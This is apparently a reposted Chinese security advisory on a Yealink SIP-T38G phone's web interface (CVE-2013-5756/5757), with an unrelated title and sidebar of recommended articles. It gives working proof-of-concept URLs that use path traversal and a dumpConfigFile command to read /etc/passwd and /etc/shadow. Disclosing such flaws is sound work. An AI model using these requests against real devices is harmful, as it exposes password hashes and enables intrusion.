linux 测试t3协议,Yealink网络电话SIP-T38G本地文件包含漏洞

最新推荐文章于 2024-02-06 19:51:06 发布
最新推荐文章于 2024-02-06 19:51:06 发布
阅读量325 收藏
点赞数
文章标签: linux 测试t3协议

发布日期:2014-08-03

更新日期:2014-08-11

受影响系统:

yealink SIP-T38G

描述:

--------------------------------------------------------------------------------

CVE(CAN) ID: CVE-2013-5756

SIP-T38G是亿联千兆彩屏网络电话。

Yealink VoIP Phone SIP-T38G存在安全漏洞,cgi-bin/cgiServer.exx没有正确过滤用户输入,特别是"page"参数值,通过精心构造的请求,经过身份验证的远程攻击者可利用此漏洞访问任意文件。

链接:http://osvdb.org/show/osvdb/108079

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Title: Yealink VoIP Phone SIP-T38G Local File Inclusion

Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team

Vendor Homepage: http://www.yealink.com/Companyprofile.aspx

Version: VoIP Phone SIP-T38G

CVE: CVE-2013-5756, CVE-2013-5757

Description:

Web interface contain a vulnerability that allow any page to be included.

We are able to disclose /etc/passwd & /etc/shadow

POC:

Using the page parameter (CVE-2013-5756):

http://

[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

http://

[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow

Using the command parameter (CVE-2013-5757):

http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")

*By viewing the shadow file we are able to conclude that cgiServer.exx run

under the root privileges. This lead to CVE-2013-5759.

建议:

--------------------------------------------------------------------------------

厂商补丁:

yealink

-------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://yealink.com

0b1331709591d260c1c78e86d0c51c18.png

weixin_39587238
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
yealink-phonebook:简单PHP应用程序可管理您的Yealink远程电话簿
05-09
Octivi-不再维护Yealink电话簿管理器简单PHP应用程序可管理您的Yealink Remote电话簿。 在我们的博客上查看的!安装使用发布文件(首选方式) 下载最新版本的YealinkPhoneBookManager 将压缩文件解压缩到您的Web目录...
关于weblogic的t3协议
TT123456XY的博客
06-25 1万+
问题描述:分行自使用BBIP以来,一直都是通过打一个tar都测试环境投产部署来进行测试,流程极其繁琐,光重启应用就得5分钟,现致力于解决此问题,通过在本地编写单元测试进行调试,但行内系统开发不像普通的应用开发本地随便Run,它涉及到一个服务调用问题,总行有很多已经投产并且在使用的公共服务,所以本地启动必须要能连上测试环境的weblogic,调用BBIP平台,需要放开下面这个标签。 这是在本地...
linux环境下,weblogic11G启用管理端口后,配置t3s协议,并配置-Dweblogic.security.TrustKeyStore=DemoTrust后,仍然提示java.io.IOEx
sxjs212的博客
11-17 1709
系统环境:Linux,中间件:WebLogic11G (安装版本 version=10.3.5.0),jdk:Oracle JRockit(R) (build R28.1.4-7-144370-1.6.0_26-20110617-2130-linux-x86_64, compiled mode 解决办法: 一,启动管理端口后,必须修改stopWebLogic.sh中ADMIN_URL为t3s协
Positive Technologies 帮助修复了流行的 Yealink 视频会议系统中的一个危险漏洞
最新发布
ptsecurity的博客
02-06 2324
专家发现,如果没有隔离区(可从互联网访问并与其他资源隔离的局域网段)或隔离区设置不完善,攻击者从外部入侵。根据负责任的披露政策,供应商获知了这一威胁,并发布了软件更新以修复该漏洞。利用这个漏洞,攻击者可以获得对企业网段的初始访问权限。是五大线上会议解决方案供应商之一。允许注入操作系统命令。我们的专家发现了视频会议系统。多个国家和地区使用。属于操作系统命令注入。的专家预估易受攻击的。
linux关闭T3协议,Linux中禁止Ctrl-Alt-Delete(转)
weixin_42610671的博客
05-15 259
Linux中禁止Ctrl-Alt-Delete(转)[@more@]默认情况,Linux系统用/etc/inittab文件来控制系统对在系统终端前同时按下[CTRL]-[ALT]-[DELETE]组合键时是reboot还是shutdown。如果你愿意的话,你可以完全禁止这个功能。只要在这个文件中的:ca::ctrlaltdel:/sbin/shutdown -t3 -r now前面加上一个注释符“...
linux系统sip网络电话,Yealink网络电话SIP-T38G绝对路径遍历漏洞
weixin_39794734的博客
05-06 235
发布日期:2014-08-03更新日期:2014-08-11受影响系统:yealink SIP-T38G描述:--------------------------------------------------------------------------------CVE(CAN) ID: CVE-2013-5757SIP-T38G是亿联千兆彩屏网络电话Yealink VoIP Phone ...
Linux服务监听
lsx15521290250的博客
03-05 760
服务监听 netstat:用来监听网络连接状态。 参数: -a 显示所有socket,包括正在监听的。 -n 以网络IP地址代替名称,显示出网络连接情形。 -o 显示与与网络计时器相关的信息 -t 显示TCP协议的连接情况 -u 显示UDP协议的连接情况 -p 显示建立相关连接的程序名和PID。 ps 作用:查看进程信息 使用: ps -ef ps aux 说明:经常在查询进程号的时候结合grep进行过滤 pstree 作用:使用树形结构查看进程信息。 kill 作用:杀死进程 示例:kill -
Linux内核实践 - 如何添加网络协议[三]:实现
yoyo的专栏
08-04 1万+
内核版本:2.6.34 接上篇《添加网络协议》。 为了用户方便查看brcm设备的工作状态,使用proc文件系统是很好的方式。一个网络协议模块可以注册到网络空间中register_pernet_subsys(),这个函数会为子空间分配一个id号,通过id可以在网络空间中找到分配给该子空间的内存:init_net->gen->ptr[id - 1]。而我们正是利用这块内存去存储pr
Tiptel-Yealink-.dob-converter:为 Tiptel 和 Yealink 手机将图像转换为 .dob 文件
06-17
Tiptel 和 Yealink 图像转换器此工具将图像转换为 .dob 文件,以用作 Tiptel 和 Yealink 手机中的徽标。 所有图像都将转换为 16 级灰度。 输出在 Tiptel IP 286 上测试。这些电话中的显示支持 4 级灰度(白色、2 级...
yealink-xml-phonebook-example
06-08
Yealink XML 远程电话簿示例 XML 电话簿的基本示例。
yealink-dialer:使用AHK脚本在yealink电话上拨打号码
05-11
亿联拨号 它有什么作用? 这只是一个小型Windows托盘应用程序,它对手机的网络服务器执行http请求,从而拨打电话。 为什么?... 请注意,该程序在其启动目录中都将查找配置.ini文件。 拿,注册表。
yealink-ws-demo
05-07
yealink-ws-demo
Linux内核实践 - 如何添加网络协议[一]:目的
yoyo的专栏
07-23 9959
本文只是一个内核网络协议的实践的例子,先说明添加的目的,下篇开始具体的实现。         内核版本:2.6.34;在支持802.1主机上,报文的一般格式:          现在需要支持一种新的协议[二层] – BRCM协议,与IP等协议不同,它位于2层,拥有6字节的头部和4字节的尾部,添加的层次决定了比起添加其它协议要复杂一些,新的报文格式如下,而我们的目的就是要网络协议栈能
yealink学习笔记20200429tftpd32的使用、md命令、pri(printenv)命令
dylanhu的博客
04-30 565
tftbd32软件的学习 1、需要上传至设备文件所存放的文件夹 2、主机ip 3.查看文件夹内的文件 使用一下命令进行文件上传 1、首先进行配置网络 setenv ipaddr 设备ip setenv netmask 设备子网掩码 setenv serverip 主机ip setenv gatewayip 默认网关 saveenv //保存配置 配置网络完成之后需要用pi...
weblogic 使用的T3 协议
热门推荐
changyanmanman的专栏
06-30 5万+
T3也称为丰富套接字,是BEA内部协议,功能丰富,可扩展性好。T3是多工双向和异步协议,经过高度优化,只使用一个套接字和一条线程。借助这种方法,基于Java的客户端可以根据服务器方需求使用多种RMI对象,但仍使用一个套接字和一条线程。配置 T3 协议  1. 如果尚未执行此操作,请在管理控制台的更改中心中单击“锁定并编辑”。   2. 在管理控制台中,展开“环境”,然后选择“服务器”。   3.
linux关闭T3协议,Linux 性能优化排查工具
weixin_31980019的博客
05-15 218
下图1为 Linux 性能优化排查工具的总结 图1诊断 CPU 工具查看 CPU 核数总核数 = 物理CPU个数 X 每颗物理CPU的核数总逻辑CPU数 = 物理CPU个数 X 每颗物理CPU的核数 X 超线程数查看物理CPU个数cat /proc/cpuinfo| grep "physical id"| sort| uniq| wc -l查看每个物理CPU中core的个数(即核数)cat /pr...
yealink学习笔记20200430uboot命令、emmc、Nand flash、Nor flash之间的区别、emmc、nand flash的读写操作
dylanhu的博客
04-30 1139
uboot命令详解 1、bootm bootm [addr [arg ...]] - boot application image stored in memory passing arguments 'arg ...'; when booting a Linux kernel, 'arg' can be the address of ...
t3 java接口_Jndiat:通过T3协议测试Weblogic服务器安全性
weixin_39830205的博客
02-27 603
JNDIAT(JNDI攻击工具)是一款开源的通过T3协议测试Weblogic server安全性的工具。JNDIAT使用示例:搜索是否有可通过T3协议访问的Weblogic端口;远程搜索有效帐户以获取特权连接;列出可访问的JNDI(Java命名和目录接口),以了解你在远程Weblogic server上可以做执行的操作(无需/使用WebLogic帐户);使用不受保护的(即“public”)JDBC...
易灵思failure to configure was detected
10-29
易灵思(Yealink)是一家专门从事通信解决方案的公司。易灵思的硬件和软件产品被广泛应用于企业和个人用户的通信设备中。当你遇到"failure to configure was detected"(检测到配置失败)的错误消息时,这意味着易灵思设备无法正确配置。 出现此错误消息可能是由于以下原因: 1. 网络连接问题:易灵思设备需要连接到正确的网络,否则无法正确配置。确保设备连接到适当的网络,检查网络连接是否正常。 2. 配置文件错误:易灵思设备需要正确的配置文件来运行,如果配置文件丢失、损坏或错误,设备将无法配置。确保配置文件正确,并检查是否按照设备的要求进行了配置。 3. 软件问题:易灵思设备可能遇到软件问题,导致配置失败。尝试重新启动设备,更新设备的软件版本或与易灵思的技术支持团队联系以获取帮助。 如果以上方法无法解决问题,建议联系易灵思的技术支持团队获取进一步的帮助。他们可以提供针对你特定设备的指导和解决方案,以解决配置失败的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值